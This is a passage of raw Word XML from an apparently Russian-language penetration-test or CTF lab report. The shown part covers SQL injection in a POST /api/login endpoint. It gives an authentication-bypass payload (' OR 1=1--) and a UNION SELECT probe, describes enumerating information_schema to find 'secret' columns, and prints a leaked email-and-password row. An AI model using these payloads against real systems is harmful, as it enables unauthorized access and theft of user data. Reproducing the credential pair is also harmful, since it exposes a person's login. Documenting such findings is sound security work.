      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C2601B">
        <w:t>login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3B8E2F88" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Особое внимание было уделено ручке POST /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, так как форма авторизации взаимодействует с таблицей пользователей и содержит параметры, напрямую влияющие на SQL-запрос. Базовая проверка с неверными учетными данными {"username":"123","password":"123"} вернула штатный ответ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Invalid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>credentials</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C23BE3" w14:textId="026CCE8C" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Первым подтвержденным уязвимым местом стала ручка POST /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Для обхода авторизации был использован </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> в поле </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: ' OR 1=1--. Такая строка меняет логику </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>исходного SQL-условия: условие OR 1=1 становится истинным, а комментарий -- отсекает остаток исходного запроса.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A534D0" w14:textId="1C147C0F" w:rsidR="00C2601B" w:rsidRPr="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
      <w:pPr>
        <w:pStyle w:val="ab"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Листинг </w:t>
      </w:r>
      <w:r w:rsidRPr="00C2601B">
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C2601B">
        <w:t>Payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C2601B">
        <w:t xml:space="preserve"> для обхода авторизации</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af4"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9622"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C2601B" w:rsidRPr="00C2601B" w14:paraId="56B74F4A" w14:textId="77777777" w:rsidTr="00603F8B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9622" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="009E5F36" w14:textId="017AC5C2" w:rsidR="00C2601B" w:rsidRPr="00B02A76" w:rsidRDefault="00C2601B" w:rsidP="00603F8B">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
            <w:r w:rsidRPr="00C2601B">
              <w:t>{"</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C2601B">
              <w:t>username":"admin","password</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C2601B">
              <w:t>":"' OR 1=1-- "}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="739FC9C0" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
      <w:pPr>
        <w:pStyle w:val="af5"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28FE3928" w14:textId="5E01517B" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
      <w:pPr>
        <w:pStyle w:val="af5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28648D20" wp14:editId="3486D21A">
            <wp:extent cx="5832000" cy="181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4_SQLi_bypass_POST_api_login.jpg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5832000" cy="1818500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE36BBA" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок 4 – Успешный </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SQLi-bypass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> в POST /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1EA8A141" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00223005">
      <w:pPr>
        <w:pStyle w:val="ab"/>
      </w:pPr>
      <w:r w:rsidRPr="00223005">
        <w:t>Таблица 10 – Результат обхода авторизации</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af4"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2835"/>
        <w:gridCol w:w="7060"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C2601B" w14:paraId="36423594" w14:textId="77777777" w:rsidTr="00223005">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="463EF68E" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00223005" w:rsidRDefault="00C2601B" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Параметр</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7060" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="78858B69" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00223005" w:rsidRDefault="00C2601B" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Результат</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C2601B" w14:paraId="18C9A082" w14:textId="77777777" w:rsidTr="00223005">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="250E411D" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00223005" w:rsidRDefault="00C2601B" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>HTTP-статус</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7060" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2EE4C0EA" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00223005" w:rsidRDefault="00C2601B" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>200 OK</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C2601B" w:rsidRPr="00C2601B" w14:paraId="154EDDDC" w14:textId="77777777" w:rsidTr="00223005">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0A1F6A5B" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00223005" w:rsidRDefault="00C2601B" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>Set-Cookie</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7060" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="723FD157" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00223005" w:rsidRDefault="00C2601B" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">user=admin; Path=/; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>SameSite</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>=Lax</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C2601B" w:rsidRPr="00C2601B" w14:paraId="246F45E8" w14:textId="77777777" w:rsidTr="00223005">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0DA20017" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00223005" w:rsidRDefault="00C2601B" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>Выведенная строка пользователя</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7060" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1AEA2A8E" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00223005" w:rsidRDefault="00C2601B" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>side_product@hotmail.com / fG5NLJlz**HXA#3X / role=user</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C2601B" w14:paraId="0D6AE4D8" w14:textId="77777777" w:rsidTr="00223005">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5BD99139" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00223005" w:rsidRDefault="00C2601B" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>Вывод</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7060" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="44A51D89" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRPr="00223005" w:rsidRDefault="00C2601B" w:rsidP="00223005">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">SQL-инъекция в поле </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>password</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00223005">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> позволяет обойти проверку учетных данных</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="58D9DE4D" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B"/>
    <w:p w14:paraId="393213C7" w14:textId="3F51DE80" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">После подтверждения обхода авторизации была проверена возможность вывода произвольных данных через UNION SELECT. Ответ сервера содержал значения </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>test_login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>test_password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>test_role</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>, что показало: исходный запрос авторизации возвращает три колонки, совместимые с текстовыми значениями.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0328199D" w14:textId="33A8152A" w:rsidR="00223005" w:rsidRPr="00C2601B" w:rsidRDefault="00223005" w:rsidP="00223005">
      <w:pPr>
        <w:pStyle w:val="ab"/>
      </w:pPr>
      <w:r w:rsidRPr="00223005">
        <w:t>Листинг 5 – Контрольный UNION SELECT</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af4"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9622"/>
      </w:tblGrid>
      <w:tr w:rsidR="00223005" w:rsidRPr="00C2601B" w14:paraId="15BBF069" w14:textId="77777777" w:rsidTr="00603F8B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9622" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="346B5C2D" w14:textId="3CFC3675" w:rsidR="00223005" w:rsidRPr="00B02A76" w:rsidRDefault="00223005" w:rsidP="00603F8B">
            <w:pPr>
              <w:pStyle w:val="ac"/>
            </w:pPr>
            <w:r w:rsidRPr="00223005">
              <w:t>{"</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:t>username":"x","password</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00223005">
              <w:t>":"' UNION SELECT 'test_login','test_password','</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00223005">
              <w:t>test_role</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00223005">
              <w:t>'-- "}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="18E797A2" w14:textId="77777777" w:rsidR="00C2601B" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
      <w:pPr>
        <w:pStyle w:val="af5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3337023E" wp14:editId="605DD359">
            <wp:extent cx="5832000" cy="1461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5_UNION_SELECT_api_login.jpg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5832000" cy="1461777"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4011160A" w14:textId="6629F184" w:rsidR="00FA7108" w:rsidRDefault="00C2601B" w:rsidP="00C2601B">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t>Рисунок 5 – Контрольный UNION SELECT через /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="74C70E3D" w14:textId="77777777" w:rsidR="00FA7108" w:rsidRPr="00FA7108" w:rsidRDefault="00FA7108" w:rsidP="00FA7108"/>
    <w:p w14:paraId="05533B0A" w14:textId="26F76156" w:rsidR="00FA7108" w:rsidRPr="00FF4CB9" w:rsidRDefault="00223005" w:rsidP="00FA7108">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:rStyle w:val="23"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00223005">
        <w:t xml:space="preserve">Извлечение структуры БД, флагов и сведений о </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00223005">
        <w:t>PostgreSQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="16D37548" w14:textId="77777777" w:rsidR="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
      <w:r w:rsidRPr="00223005">
        <w:t xml:space="preserve">Через </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00223005">
        <w:t>information_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00223005">
        <w:t>schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00223005">
        <w:t xml:space="preserve"> был получен список пользовательских таблиц схемы </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00223005">
        <w:t>public</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00223005">
        <w:t xml:space="preserve">. Затем через </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00223005">
        <w:t>information_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00223005">
        <w:t>schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00223005">
        <w:t xml:space="preserve"> были получены имена колонок. Наиболее важными оказались колонки </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00223005">
        <w:t>secret</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00223005">
        <w:t>, присутствующие в нескольких таблицах</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49470227" w14:textId="77777777" w:rsidR="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
      <w:pPr>
        <w:pStyle w:val="af5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F7138E6" wp14:editId="55A086C7">
            <wp:extent cx="5832000" cy="1608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6_information_schema_tables.jpg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5832000" cy="1608172"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="442A7872" w14:textId="77777777" w:rsidR="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок 6 – Получение списка таблиц через </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>information_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2C5B84EF" w14:textId="77777777" w:rsidR="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
      <w:pPr>
        <w:pStyle w:val="ab"/>
      </w:pPr>
      <w:r w:rsidRPr="00223005">
        <w:t>Таблица 11 – Полученные таблицы пользовательской схемы</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af4"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9895"/>
      </w:tblGrid>
      <w:tr w:rsidR="00223005" w14:paraId="1084E94D" w14:textId="77777777" w:rsidTr="00223005">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9895" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4E077E4B" w14:textId="77777777" w:rsidR="00223005" w:rsidRPr="00223005" w:rsidRDefault="00223005" w:rsidP="00223005">
